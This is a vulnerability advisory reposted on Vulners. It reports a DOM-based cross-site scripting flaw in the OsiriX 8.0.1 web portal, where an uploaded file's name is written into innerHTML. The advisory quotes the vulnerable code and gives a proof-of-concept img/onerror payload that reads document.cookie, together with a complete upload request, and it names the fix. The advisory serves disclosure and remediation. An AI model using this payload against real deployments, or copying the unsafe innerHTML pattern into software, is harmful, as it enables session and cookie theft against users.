Vulners
Lucene search
OsiriX Web Portal 8.0.1 DOM Based XSS
<html><body><p>OsiriX Web Portal 8.0.1 DOM Based XSS
Vendor: Pixmeo Sarl
Product web page: http://www.osirix-viewer.com
Affected version: OsiriX 8.0.1
Summary: With high performance and an intuitive interactive user interface, OsiriX MD is
the most widely used DICOM viewer in the world. It is the result of more than 10 years of
research and development in digital imaging. It fully supports the DICOM standard for an
easy integration in your workflow environment and an open platform for development of
processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive
innovative technique for 3D and 4D navigation and a complete integration with any PACS.
OsiriX MD supports 64-bit computing and multithreading for the best performances on the
most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.
Desc: OsiriX suffers from a DOM-based XSS vulnerability because it doesn't use proper sanitization
when user input goes to a dangerous HTML modification sink ((element).innerHTML). This can be
exploited to execute arbitrary HTML and script code in a user's browser DOM in context of an
affected site.
Tested on: macOS 12.10.2 (Sierra)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5381
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5381.php
29.11.2016
--
------vuln-----
function fileSelected() {
var file = document.getElementById('fileToUpload').files[0];
if (file) {
var fileSize = 0;
if (file.size > 1024 * 1024)
fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB';
else
fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB';
document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss
document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize;
document.getElementById('fileType').innerHTML = 'Type: ' + file.type;
}
}
function uploadFile()
{
document.getElementById('progressbar').innerHTML = '0%';
document.getElementById("progressbar").style.width = '0%';
document.getElementById("progressbar").className = "progress-bar progress-bar-striped";
document.getElementById("upload_button").className = "btn btn-default disabled";
setTimeout(function(){
var fd = new FormData();
fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]);
var xhr = new XMLHttpRequest();
xhr.upload.addEventListener("progress", uploadProgress, false);
xhr.addEventListener("load", uploadComplete, false);
xhr.addEventListener("error", uploadFailed, false);
xhr.addEventListener("abort", uploadCanceled, false);
xhr.open("POST", "", true);
xhr.send(fd);
}, 500);
}
...
</p><form action="javascript:void(0);" class="col-md-12" enctype="multipart/form-data" id="form1" method="post">
<div class="form-group col-md-12">
<label for="fileToUpload">File input</label>
<input id="fileToUpload" name="file" onchange="fileSelected();" type="file"/>
<div class="help-block">
<div id="fileName"></div> // xss
<div id="fileSize"></div>
<div id="fileType"></div>
</div>
</div>
<div class="col-lg-2 col-md-3">
<button class="btn btn-default" id="upload_button" name="upload_button" onclick="uploadFile()" type="submit" value="Upload">Upload</button>
</div>
<div class="col-lg-10 col-md-9 help-block">
<div class="progress" id="progressbar_containter" style="display: none;">
<div aria-valuemax="100" aria-valuemin="0" aria-valuenow="2" class="progress-bar progress-bar-striped" id="progressbar" role="progressbar" style="min-width: 2em;"></div>
</div>
</div>
</form>
------/vuln-----
Element output: <div id="fileName">Name: <img :="" onerror="alert(document.cookie)" src="#"/>.mp3</div>
Fix: (element).innerText or (element).textContent
PoC payload: <img onerror="alert(document.cookie" src="#"/>:
POST /main HTTP/1.1
Host: 127.0.0.1:3333
Content-Length: 381
Origin: http://127.0.0.1:3333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi
Accept: */*
Referer: http://127.0.0.1:3333/main
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346
DNT: 1
Connection: close
------WebKitFormBoundaryBUg5yXYbUF1w5AEi
Content-Disposition: form-data; name="fileToUpload"; filename="<img onerror="%22alert(document.cookie)%22:" src="%22#%22"/>.mp3"
Content-Type: audio/mp3
Zero Science Lab
------WebKitFormBoundaryBUg5yXYbUF1w5AEi--
</body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2016 00:00Current
6.1Medium risk
Vulners AI Score6.1